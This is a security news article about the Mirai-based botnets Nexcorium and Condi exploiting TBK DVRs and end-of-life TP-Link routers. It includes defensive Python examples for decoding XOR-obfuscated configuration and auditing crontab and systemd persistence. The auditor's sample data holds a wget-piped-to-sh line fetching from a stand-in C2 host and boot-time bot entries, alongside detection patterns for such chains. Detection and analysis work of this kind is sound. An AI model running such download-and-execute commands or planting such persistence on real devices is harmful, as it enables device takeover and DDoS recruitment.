Mirai Botnet Variants Nexcorium and Condi Exploit TBK DVRs and EoL TP-Link Routers to Launch Large-Scale DDoS Attacks

Cybersecurity researchers have uncovered a sophisticated wave of attacks orchestrated by threat actors targeting critical vulnerabilities in Internet of Things (IoT) devices, specifically focusing on TBK digital video recorders (DVRs) and legacy TP-Link wireless routers. These campaigns, detailed in recent reports from Fortinet FortiGuard Labs and Palo Alto Networks Unit 42, involve the deployment of specialized Mirai-based botnet variants known as Nexcorium and Condi. By weaponizing both modern and years-old security flaws, attackers are rapidly expanding their infrastructure to facilitate massive Distributed Denial-of-Service (DDoS) attacks, highlighting a persistent and evolving threat to global network stability.
The exploitation of IoT infrastructure has become a cornerstone of cybercriminal operations due to the sheer volume of unsecured devices connected to the internet. According to Vincent Li, a security researcher at Fortinet, these devices are prime targets because they often lack consistent patching, utilize weak default credentials, and are frequently overlooked by standard enterprise security protocols. The latest findings underscore a trend where attackers no longer rely solely on new "zero-day" exploits but instead maximize the utility of known vulnerabilities in end-of-life (EoL) hardware that remains in active use across residential and small-business environments.
The Emergence of Nexcorium: Targeting TBK DVR Systems
One of the primary focal points of the current threat landscape is the exploitation of CVE-2024-3721, a command injection vulnerability with a CVSS score of 6.3. This medium-severity flaw affects TBK DVR-4104 and DVR-4216 devices, which are widely used for physical security surveillance. Threat actors leverage this vulnerability to gain initial access and deliver a downloader script. This script identifies the architecture of the host Linux system and fetches the appropriate binary for a new Mirai variant dubbed Nexcorium.
Upon successful execution, Nexcorium makes its presence known by displaying a defiant terminal message: "nexuscorp has taken control." The technical analysis of Nexcorium reveals a sophisticated architecture that mirrors the original Mirai source code but incorporates modern enhancements for evasion and persistence. The malware utilizes an XOR-encoded configuration table to hide its command-and-control (C2) server addresses and operational parameters from basic string analysis.
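The XOR-encoded configuration table mentioned above is a common Mirai inheritance: the bot stores its C2 hostname and other strings XORed with a fixed key so that `strings` on the binary shows nothing useful. The block below is an added analysis example (it is not the Fortinet report's code or anything taken from Nexcorium) showing how an analyst recovers such a table from a memory or file dump by brute-forcing a single-byte key and scoring the output for plaintext-likeness. The table layout (NUL-terminated entries), the sample entries and the 0x22 key are all constructed assumptions for illustration; a real sample's key, layout and entries will differ.

```python
import string
from typing import List

PRINTABLE = set(string.printable.encode())


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def plaintext_score(data: bytes) -> int:
    """Heuristic: ASCII letters/digits score 2, other printable bytes and NUL
    terminators score 1, anything else -4. The right key turns config entries
    into things that look like hostnames, paths and messages."""
    score = 0
    for b in data:
        if b < 128 and chr(b).isalnum():
            score += 2
        elif b in PRINTABLE or b == 0:
            score += 1
        else:
            score -= 4
    return score


def recover_key(blob: bytes) -> int:
    """Try all 256 single-byte keys and keep the one with the most plaintext-like output."""
    return max(range(256), key=lambda k: plaintext_score(xor_bytes(blob, k)))


def parse_table(blob: bytes, key: int) -> List[str]:
    """Decode the table and split it into NUL-terminated entries (assumed layout)."""
    plain = xor_bytes(blob, key)
    return [e.decode("ascii", errors="replace") for e in plain.split(b"\x00") if e]


# Constructed sample table: three entries obfuscated with an assumed key of 0x22.
# The C2 name uses the reserved .invalid TLD; nothing here comes from a real sample.
ASSUMED_KEY = 0x22
SAMPLE_PLAINTEXT = b"c2.example.invalid\x00/bin/busybox\x00nexuscorp has taken control\x00"
SAMPLE_BLOB = xor_bytes(SAMPLE_PLAINTEXT, ASSUMED_KEY)

if __name__ == "__main__":
    key = recover_key(SAMPLE_BLOB)
    print(f"recovered key: 0x{key:02x}")
    for entry in parse_table(SAMPLE_BLOB, key):
        print("  ", entry)
```

The scoring deliberately favours letters and digits over punctuation, because several wrong keys map lowercase text onto printable punctuation and would tie under a plain "is it printable" check. Once the table is decoded, the recovered C2 hostnames and ports are the values worth feeding into DNS and egress blocklists.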
Furthermore, Nexcorium includes a dedicated watchdog module designed to ensure the malware remains running by monitoring system processes and restarting the bot if it is terminated. Its DDoS module is capable of launching diverse attack vectors, including UDP, TCP, and SMTP floods. To expand its reach, the malware also incorporates an exploit for CVE-2017-17215, a long-known vulnerability in Huawei HG532 devices. This allows the botnet to spread laterally across the network, turning a single compromised DVR into a gateway for infecting nearby networking hardware.
Persistence and Lateral Movement Strategies
The Nexcorium variant distinguishes itself through its aggressive persistence mechanisms. Once it gains a foothold, the malware attempts to establish a permanent presence using both crontab and systemd services. This ensures that even if the device is rebooted, the botnet payload will automatically re-execute. To evade forensic analysis and post-infection detection, the malware is programmed to delete its original downloaded binary immediately after establishing persistence in the system’s memory.
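The crontab and systemd persistence described above leaves artefacts a defender can hunt for on a Linux device. The following is an added example (it is not code from Fortinet or from the malware) that audits constructed crontab text and a constructed systemd unit for the indicators such persistence tends to show: a command launched from a world-writable directory, a download-and-execute chain, boot-time re-execution, and a `Restart=always` service wrapped around a suspicious binary. The indicator list, the sample entries and the `.nx` path are assumptions chosen for illustration.

```python
import re
from typing import List, Tuple

# Assumed indicators for illustration; tune the lists to the device under review.
WRITABLE_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
DOWNLOAD_EXEC_RE = re.compile(
    r"\b(?:wget|curl|tftp)\b.*(?:\|\s*(?:sh|bash)\b|;\s*(?:sh|chmod)\b)"
)


def check_command(cmd: str) -> List[str]:
    """Return the reasons a command line looks like bot persistence (empty = clean)."""
    reasons = []
    if any(d in cmd for d in WRITABLE_DIRS):
        reasons.append("runs from world-writable directory")
    if DOWNLOAD_EXEC_RE.search(cmd):
        reasons.append("download-and-execute chain")
    return reasons


def audit_crontab(text: str) -> List[Tuple[str, List[str]]]:
    """Scan a user crontab: five schedule fields (or an @keyword) followed by the command."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
        cmd = parts[-1] if len(parts) >= 2 else ""
        reasons = check_command(cmd)
        if reasons and line.startswith("@reboot"):
            reasons.append("re-executes at every boot")
        if reasons:
            findings.append((line, reasons))
    return findings


def audit_unit(text: str) -> List[str]:
    """Scan a systemd service unit; a suspicious ExecStart plus Restart=always behaves like a watchdog."""
    reasons: List[str] = []
    restart_always = False
    for line in text.splitlines():
        key, _, value = line.strip().partition("=")
        if key in ("ExecStart", "ExecStartPre"):
            reasons += check_command(value)
        elif key == "Restart" and value.strip() == "always":
            restart_always = True
    if reasons and restart_always:
        reasons.append("Restart=always keeps a suspicious service alive")
    return reasons


# Constructed samples: one benign crontab entry, two persistence entries, one unit file.
CRONTAB_SAMPLE = """
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
@reboot /tmp/.nx/bot >/dev/null 2>&1
*/5 * * * * wget -q http://c2.example.invalid/d.sh -O- | sh
"""

UNIT_SAMPLE = """[Unit]
Description=Network Helper

[Service]
ExecStart=/dev/shm/.nx/bot
Restart=always
RestartSec=5

[Install]
WantedBy=multi-user.target
"""

if __name__ == "__main__":
    for entry, why in audit_crontab(CRONTAB_SAMPLE):
        print(f"crontab: {entry}\n    {', '.join(why)}")
    print("unit:", ", ".join(audit_unit(UNIT_SAMPLE)) or "clean")
```

Because the article notes that the downloaded binary is deleted once persistence is in place, a second check worth pairing with this one is a running process whose `/proc/<pid>/exe` link reads `(deleted)`: the process survives in memory while the file it was started from is gone.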
A significant component of Nexcorium’s strategy is its reliance on brute-force attacks. The malware contains an embedded list of hard-coded usernames and passwords commonly used as factory defaults for IoT devices. It scans the local network for open Telnet ports (typically port 23) and attempts to log in. If successful, it seeks to obtain a shell and repeat the infection process, effectively creating a self-propagating worm.

Fortinet researchers noted that the combination of vulnerability exploitation and extensive brute-force capabilities underscores the adaptability of modern botnets. By targeting devices like the TBK DVR, which are often connected to the internet 24/7 without robust firewalls, attackers can build a massive, always-on army of "zombie" devices ready to strike at a moment’s notice.
TP-Link Vulnerabilities and the Rise of the Condi Botnet
Parallel to the Nexcorium campaign, researchers at Palo Alto Networks Unit 42 have identified automated scanning and probing activities targeting a critical flaw in TP-Link wireless routers. This vulnerability, tracked as CVE-2023-33538, carries a high CVSS score of 8.8. It is a command injection flaw that allows authenticated attackers to execute arbitrary code on the device’s web interface.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recognized the severity of this issue by adding it to the Known Exploited Vulnerabilities (KEV) catalog in June 2025. Despite the availability of this information, many users continue to operate TP-Link models that have reached their end-of-life (EoL) status, meaning the manufacturer no longer provides security updates or technical support.
The malware being deployed in these attacks is a Mirai-like variant frequently referred to as "Condi." Unit 42’s analysis of the Condi source code revealed several unique features, including the ability for the malware to act as its own web server. This allows an infected router to serve the malware payload to other vulnerable devices that connect to it, facilitating a decentralized and rapid infection rate. Additionally, Condi includes a self-update mechanism, allowing the botnet operators to push new modules or C2 configurations to the infected fleet without needing to re-exploit the devices.
Interestingly, Unit 42 researchers Asher Davila, Malav Vyas, and Chris Navarrete observed that many of the current in-the-wild attacks targeting CVE-2023-33538 appear to be flawed. The automated scripts used by the attackers often fail to complete the exploitation chain correctly. However, the researchers cautioned that this "flawed approach" should not lead to complacency. The underlying vulnerability is real and easily exploitable by a more skilled actor, particularly because the flaw can be triggered if an attacker gains access to the router’s web interface—a task made easier by the prevalence of weak or default administrative credentials.
A Chronology of IoT Exploitation and Mirai Evolution
The current surge in botnet activity is the latest chapter in a history that began in 2016 with the original Mirai botnet, which famously took down major portions of the internet through attacks on DNS provider Dyn. When the Mirai source code was leaked online shortly after, it democratized DDoS capabilities, allowing various threat actor groups to create their own "flavors" of the malware.
- September 2023 – Early 2024: Attackers began pivoting toward newer IoT vulnerabilities in consumer-grade routers and DVRs, moving away from enterprise servers to exploit the lack of security in residential hardware.
- June 2025: CISA officially listed CVE-2023-33538 (TP-Link) in the KEV catalog, signaling that the flaw was being actively exploited in the wild.
- September 2025: CloudSEK disclosed a "Loader-as-a-Service" infrastructure. This cybercrime model allows low-skilled attackers to rent botnet infection capabilities to distribute payloads like RondoDox, Morte, and Mirai variants.
- Late 2025: Fortinet and Unit 42 released findings on Nexcorium and Condi, revealing that botnets are now integrating multiple exploits (ranging from 2017 to 2024) into a single payload to maximize infection success.
This timeline illustrates a shift in strategy. Rather than searching for one "master" exploit, botnet operators are now building modular toolkits that can probe for dozens of different vulnerabilities simultaneously. This "shotgun approach" ensures that even if one vulnerability is patched, the botnet can still find a foothold through another unpatched flaw on the same network.
The Economic and Strategic Impact of Botnets
The proliferation of Nexcorium and Condi is driven by a lucrative underground economy. Botnets are rarely used by their creators for a single purpose; instead, they are often "rented out" as DDoS-for-hire services (also known as "booter" or "stresser" services). These services allow malicious actors to target online gaming platforms, financial institutions, and government websites for a relatively low cost.

In January 2025, the cybersecurity community witnessed a record-breaking 56 Tbps DDoS attack, a testament to the staggering power that modern botnets can generate when hundreds of thousands of IoT devices are synchronized. Such attacks can cause significant financial damage, resulting in lost revenue for e-commerce sites, increased operational costs for service providers, and severe reputational damage.
Moreover, the use of botnets extends beyond mere disruption. State-sponsored actors and advanced persistent threat (APT) groups have been known to use compromised IoT networks as obfuscated proxies. By routing their malicious traffic through a legitimate residential router or a DVR, these actors can hide their true origin, making it difficult for defenders to attribute cyberattacks to specific nation-states or criminal organizations.
Risk Mitigation and Strategic Recommendations
The persistent exploitation of EoL devices like TP-Link routers and TBK DVRs presents a significant challenge for the cybersecurity community. Because these devices no longer receive security updates, the only truly effective mitigation is the physical replacement of the hardware. However, for many home users and small businesses, the "if it isn’t broken, don’t fix it" mentality often prevails, leaving them vulnerable to botnet recruitment.
To combat the threat of Nexcorium, Condi, and future Mirai variants, security experts recommend several key defensive measures:
- Hardware Lifecycle Management: Organizations and individuals must audit their network hardware and identify devices that have reached EoL status. Replacing these with modern, supported hardware is critical.
- Credential Hygiene: The use of default administrative credentials remains the single largest entry point for botnets. Changing default passwords to unique, complex strings is a fundamental requirement for IoT security.
- Network Segmentation: Critical devices, such as DVRs and security cameras, should be placed on a separate VLAN (Virtual Local Area Network) with restricted access to the broader internet. This prevents a compromised IoT device from being used to move laterally into more sensitive parts of the network.
- Disabling Unnecessary Services: Features like Telnet and UPnP (Universal Plug and Play) are frequently exploited by botnets. Disabling these services on routers and IoT devices significantly reduces the attack surface.
- Monitoring and Threat Detection: Utilizing security solutions that can detect anomalous outbound traffic (such as massive spikes in UDP or TCP traffic) can help identify an infected device before it participates in a large-scale DDoS attack.
Conclusion: The Future of IoT Security
As the digital landscape expands with the rollout of 5G and the continued proliferation of smart devices, the "attack surface" available to botnet operators will only grow. The discovery of Nexcorium and Condi serves as a stark reminder that the vulnerabilities of the past continue to haunt the present. The cybersecurity industry must move toward a model of "security by design," where IoT manufacturers are held to higher standards regarding long-term support and the elimination of default credentials.
For the foreseeable future, the battle against botnets will be a game of cat and mouse. While researchers work to dismantle C2 infrastructures and identify new variants, threat actors will continue to refine their malware, seeking out the next unpatched router or forgotten DVR to add to their growing digital armies. The persistence of Nexcorium and Condi underscores a fundamental truth in modern cybersecurity: an unpatched device is not just a risk to its owner, but a potential weapon against the entire global internet infrastructure.